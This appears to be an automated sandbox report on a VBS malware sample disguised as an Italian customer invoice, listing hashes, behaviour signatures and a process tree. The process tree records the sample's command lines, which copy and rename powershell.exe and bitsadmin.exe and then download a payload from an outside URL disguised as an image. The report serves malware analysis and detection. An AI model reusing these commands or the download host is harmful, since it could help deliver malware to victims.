Analysis

max time kernel: 137s
max time network: 52s
platform: windows10_x64
resource: win10v200430
submitted: 13-07-2020 07:45

Static task: static1

Behavioral task: behavioral1
Sample: Fatt_cliente_STRPRI81C06H264H.vbs
Resource: win7
0 signatures
0 seconds

Behavioral task: behavioral2
Sample: Fatt_cliente_STRPRI81C06H264H.vbs
Resource: win10v200430
0 signatures
0 seconds
General

Target: Fatt_cliente_STRPRI81C06H264H.vbs
Size: 3KB
MD5: f8f845a5680b862bb8cbc3f0963e8a24
SHA1: 132a39312e13dafab31cca938c64745fd7a82b29
SHA256: e9d30232236a8c05a58a9cc13ef79a0d360213ef096f69a3b9f7199e4b458df3
SHA512: e5772c837fae26bb4cf2cd8b4c0adae3f652faf74afed8fe7894fffea2eedce0296c147bef58e1a24c3239bf9ed076c4747c1263d4b472172a1469d2c6afe430
Score: 8/10
Malware Config

Signatures

Suspicious use of WriteProcessMemory (7 IoCs)
Processes:
  description                        pid   process       target process
  PID 992 wrote to memory of 3828    992   WScript.exe   cmd.exe
  PID 992 wrote to memory of 3828    992   WScript.exe   cmd.exe
  PID 992 wrote to memory of 1148    992   WScript.exe   cmd.exe
  PID 992 wrote to memory of 1148    992   WScript.exe   cmd.exe
  PID 992 wrote to memory of 1340    992   WScript.exe   iXRgjlH.exe
  PID 992 wrote to memory of 1340    992   WScript.exe   iXRgjlH.exe
  PID 992 wrote to memory of 1340    992   WScript.exe   iXRgjlH.exe

Executes dropped EXE (1 IoCs)
Processes:
  pid    process
  1340   iXRgjlH.exe
Processes

Level 1: C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fatt_cliente_STRPRI81C06H264H.vbs"
  - Suspicious use of WriteProcessMemory

  Level 2: C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\ziXRgjlH.exe

  Level 2: C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\iXRgjlH.exe

  Level 2: C:\Users\Admin\AppData\Roaming\iXRgjlH.exe
    Command line: "C:\Users\Admin\AppData\Roaming\iXRgjlH.exe" /transfer pJVFLY /download https://peliculadeestreno.com/libuna/STRPRI81C06H264H/en.jpg C:\Users\Admin\AppData\Roaming\en.jpg
    - Executes dropped EXE